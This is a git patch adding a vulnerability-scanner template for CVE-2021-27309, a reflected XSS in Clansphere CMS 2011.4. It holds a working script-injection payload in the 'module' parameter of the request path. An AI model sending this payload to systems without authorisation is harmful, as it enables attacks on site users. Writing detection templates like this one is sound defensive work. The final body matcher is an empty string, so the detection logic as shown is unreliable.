From 3a0a8baa94163c9cbe02ea0eba808396486e41ed Mon Sep 17 00:00:00 2001 From: edoardottt Date: Fri, 17 Jun 2022 08:01:40 +0200 Subject: [PATCH] Add CVE-2021-27309 --- cves/2021/CVE-2021-27309.yaml | 38 +++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2021/CVE-2021-27309.yaml diff --git a/cves/2021/CVE-2021-27309.yaml b/cves/2021/CVE-2021-27309.yaml new file mode 100644 index 0000000000..f33ae50b2f --- /dev/null +++ b/cves/2021/CVE-2021-27309.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-27309 + +info: + name: Clansphere CMS 2011.4 - Reflected XSS + author: edoardottt + severity: medium + description: Clansphere CMS 2011.4 allows unauthenticated reflected XSS via "module" parameter. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-27309 + cwe-id: CWE-79 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-27309 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27309 + - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22module%22%20xss.md + tags: cve,cve2021,clansphere,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language&module=module%27%22()%26%25%3Cyes%3E%3CScRiPt%20%3Ealert(9904)%3C/ScRiPt%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - "" \ No newline at end of file